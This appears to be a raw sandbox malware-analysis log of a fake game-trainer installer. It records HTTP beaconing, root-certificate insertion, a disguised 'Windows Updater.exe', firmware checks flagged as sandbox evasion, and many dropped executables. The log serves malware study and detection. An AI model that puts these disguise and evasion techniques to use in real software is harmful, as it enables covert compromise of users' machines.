                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 Blob
                                  Source: C:\Users\user\Desktop\ZmWSzgevgt.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0270L.tmp\setup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a0.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX

                                  Malware Analysis System Evasion

                                  barindex
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_0007E37028_2_0007E370
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_0050E37031_2_0050E370
                                  Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: FirmwareTableInformation
                                  Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: FirmwareTableInformation
                                  Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: FirmwareTableInformation
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: GetAdaptersInfo,GetAdaptersInfo,20_2_6A545650
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: GetAdaptersInfo,20_2_6A546790
                                  Source: C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exeWindow / User API: threadDelayed 8077Jump to behavior
                                  Source: C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exeWindow / User API: threadDelayed 1546Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6ED3.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI7F4A.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpDropped PE file which has not been started: C:\Program Files (x86)\VxCXHgOKWFitaVL Corporation\is-92M1P.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6F72.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpDropped PE file which has not been started: C:\Program Files (x86)\VxCXHgOKWFitaVL Corporation\is-J9JTN.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TMJSM.tmp\_isetup\_setup64.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\expand.exeDropped PE file which has not been started: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\2041dcc7124af9419b0b672e9d7171f7.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI735E.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpDropped PE file which has not been started: C:\Program Files (x86)\river-city-rival-showdown-trainer-15-v1-8-.exe\is-74O1B.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC676.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Windows\Temp\shi5EB1.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi13CD.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6929.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1239.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSID0B4.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIB48C.tmpJump to dropped file
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeDropped PE file which has not been started: C:\Windows\Temp\shi4BD5.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi135F.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Windows\Temp\shi4D3B.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Windows\Temp\shi4DAA.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Windows\Temp\shi74BC.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\expand.exeDropped PE file which has not been started: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\cd2f845e419388478df81bc59730a20b.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\expand.exeDropped PE file which has not been started: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\51ccd7e4634de4468d3b8ec370ae3220.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSICF56.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6DC5.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI8057.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6F32.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIB4CC.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\expand.exeDropped PE file which has not been started: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\f88670462385d642bd8a486306392759.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-0270L.tmp\_isetup\_setup64.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shiFA87.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpDropped PE file which has not been started: C:\Program Files (x86)\VxCXHgOKWFitaVL Corporation\is-KD7U9.tmpJump to dropped file
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeDropped PE file which has not been started: C:\ProgramData\AW Manager\Windows Manager\updates\v114\v114.exe.partJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC98F.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6F03.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI5D6E.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA493.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSICEC6.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSICF36.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shiFB53.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSICEF6.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSICFD6.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpDropped PE file which has not been started: C:\Program Files (x86)\VxCXHgOKWFitaVL Corporation\is-1L53Q.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6E83.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\expand.exeDropped PE file which has not been started: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\d98380e50ba80f4fa3adba0346158290.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\expand.exeDropped PE file which has not been started: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\078630d72d217d4d9885ece5b71fe988.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI5C23.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC813.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA463.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSICE09.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC92E.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA3F5.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6EA3.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Windows\Temp\shi5E23.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1F60.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSID036.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1E63.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpDropped PE file which has not been started: C:\Program Files (x86)\VxCXHgOKWFitaVL Corporation\is-PML8F.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1DA7.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA5ED.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1259.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSICF16.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\_isetup\_setup64.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIB6B2.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIB05F.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Windows\Temp\shi743E.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\expand.exeDropped PE file which has not been started: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\e6adbd27df47824481105a18183e1d5e.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI73CD.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC97E.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIB0CD.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shiF808.tmpJump to dropped file
